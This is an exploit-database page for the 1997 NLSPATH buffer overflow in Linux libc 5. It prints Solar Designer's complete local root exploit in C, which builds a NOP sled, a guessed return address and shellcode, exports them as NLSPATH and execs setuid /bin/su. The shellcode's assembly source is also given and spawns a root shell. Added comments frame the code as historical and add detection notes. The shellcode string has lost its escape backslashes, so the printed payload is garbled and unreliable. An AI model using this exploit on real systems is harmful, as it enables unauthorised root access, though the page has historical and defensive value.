Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) – libc NLSPATH

Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) – libc NLSPATH

漏洞ID 1053357 漏洞类型
发布时间 1998-01-19 更新时间 1998-01-19
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19302
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/379/info


There is a serious vulnerability in Linux libc affecting all Linux distributions using libc 5.2.18 and below. The vulnerability is centered on the NLSPATH environment variable: by exporting an oversized buffer that includes shellcode in NLSPATH, it is possible to exploit any setuid root program based on libc [almost all] and gain root access on the machine.


--- nlspath.c ---

/*
 * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
 * Copyright (c) 1997 by Solar Designer
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Payload byte string: the assembled form of the shellcode.s listing further
 * down, followed by the "/bin/sh" path it runs.  Kept verbatim as historical
 * record.
 */
char *shellcode =
  "x31xc0xb0x31xcdx80x93x31xc0xb0x17xcdx80x68x59x58xffxe1"
  "xffxd4x31xc0x99x89xcfxb0x2ex40xaex75xfdx89x39x89x51x04"
  "x89xfbx40xaex75xfdx88x57xffxb0x0bxcdx80x31xc0x40x31xdb"
  "xcdx80/"
  "/bin/sh"
  "0";

/*
 * Returns the current stack pointer.  Relies on the i386 convention that a
 * function's result is left in %eax: the asm copies %esp there and there is
 * no C return statement, so this is compiler- and ABI-specific (falling off
 * the end of a non-void function is undefined behaviour by the C standard).
 */
char *get_sp() {
   asm("movl %esp,%eax");
}

/* Size of the value exported as NLSPATH.  The size of the destination buffer
 * in the vulnerable libc is not given on this page; 2048 is presumably well
 * past it — TODO confirm against the fixed libc source. */
#define bufsize 2048
char buffer[bufsize];

/*
 * Historical proof-of-concept (1997) for the NLSPATH overflow in Linux libc 5.
 * Builds `buffer` as: a guessed stack address repeated every 4 bytes, a
 * 512-byte NOP (0x90) sled at the front, then the payload; exports it as
 * NLSPATH and execs a setuid binary so that the libc inside that privileged
 * process copies the oversized value.
 *
 * Defensive notes: the page title says libc 5.3.12 while the advisory text
 * says 5.2.18 and below — confirm the affected range against the vendor
 * advisory.  NOTE(review): the standard hardening (what glibc's secure-execution
 * mode does) is for setuid/setgid programs to ignore NLSPATH and similar
 * environment variables entirely; an unusually long NLSPATH value in the
 * environment of a setuid process is the observable artifact for detection.
 *
 * `main()` is written in pre-C99 implicit-int style and returns no value; the
 * closing brace is only reached if execl() fails.
 */
main() {
  int i;

  /* Fill the whole buffer with one guessed stack address (current %esp minus
   * 3072), four bytes at a time. */
  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 3072;

  /* NOP sled at the front, payload immediately after it. */
  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  /* NUL-terminate so setenv() sees a proper C string. */
  buffer[bufsize - 1] = 0;

  /* The attack surface: a libc-read environment variable inherited by a
   * privileged process. */
  setenv("NLSPATH", buffer, 1);

  execl("/bin/su", "/bin/su", NULL);
}

--- nlspath.c ---

And the shellcode separately:

--- shellcode.s ---

/*
 * Assembly source of the payload string in nlspath.c, listed by the original
 * author for reference.  It issues a sequence of Linux i386 system calls via
 * int $0x80 and ends with the "/bin/sh" path embedded at the end of the
 * listing.  Kept verbatim as historical record; no per-instruction
 * annotation is added here.
 */
.text
.globl shellcode
shellcode:
xorl %eax,%eax
movb $0x31,%al
int $0x80
xchgl %eax,%ebx
xorl %eax,%eax
movb $0x17,%al
int $0x80
.byte 0x68
popl %ecx
popl %eax
jmp *%ecx
call *%esp
xorl %eax,%eax
cltd
movl %ecx,%edi
movb $'/'-1,%al
incl %eax
scasb %es:(%edi),%al
jne -3
movl %edi,(%ecx)
movl %edx,4(%ecx)
movl %edi,%ebx
incl %eax
scasb %es:(%edi),%al
jne -3
movb %dl,-1(%edi)
movb $0x0B,%al
int $0x80
xorl %eax,%eax
incl %eax
xorl %ebx,%ebx
int $0x80
.byte '/'
.string "/bin/sh0"

--- shellcode.s ---
